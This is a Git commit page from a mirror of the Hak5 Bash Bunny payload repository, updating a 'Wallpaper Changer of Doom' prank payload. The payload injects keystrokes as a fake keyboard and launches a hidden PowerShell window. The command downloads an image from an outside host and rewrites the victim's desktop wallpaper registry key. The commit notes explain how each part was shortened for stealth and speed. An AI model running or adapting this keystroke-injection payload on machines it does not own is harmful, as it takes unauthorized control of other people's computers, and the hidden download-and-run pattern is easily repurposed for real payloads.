hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update payload.txt (#365)

Browse Source 
Some more shortening. Only 183 characters!

powershell -w h "$p=$home+'\b.jpg';iwr h4k.cc/b.jpg -O $p;SP 'HKCU:Control Panel\Desktop' WallPaper $p;1..59|%{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}"

* Omit http:// from URI
* powershell -w h to start a hidden powershell windows
* set variable $p for later re-use (saves characters)
* Omit -Uri and redundant characters in -Outfile (-O)
 switches
* 1..59|% to create a loop for 60 seconds
* use $home as directory
This commit is contained in:
Rosius Yves 2019-01-23 08:24:56 +01:00 committed by Darren Kitchen
parent 0273c87be2
commit 0ee25f8d0d
1 changed files with 8 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
payloads/library/prank/wallpaper-changer-of-doom/payload.txt
View File

@ -1,14 +1,14 @@
# Wallpaper Changer OF DOOM!!!!
# Author: Hak5Darren
# Props: Alex Goat
# Demo: Hak5 episode 2502 - https://youtu.be/f3C58OKOsuo
# Target: Windows Vista+
# Category: Prank
# Author: Hak5Darren
# Props: Alex Goat
# Demo: Hak5 episode 2502 - https://youtu.be/f3C58OKOsuo
# Target: Windows Vista+
# Category: Prank
LED SETUP
ATTACKMODE HID
LED ATTACK
Q GUI r
Q DELAY 500
Q STRING "cmd /C \"start /MIN powershell iwr -Uri http://h4k.cc/b.jpg -OutFile c:\windows\temp\b.jpg;sp 'HKCU:Control Panel\Desktop' WallPaper 'c:\windows\temp\b.jpg';\$a=1;do{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}while(\$a++-le59)\""
Q ENTER
Q DELAY 500
Q STRING "powershell -w h \"\$p=\$home+'\b.jpg';iwr h4k.cc/b.jpg -O \$p;SP 'HKCU:Control Panel\Desktop' WallPaper \$p;1..59|%{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}""
Q ENTER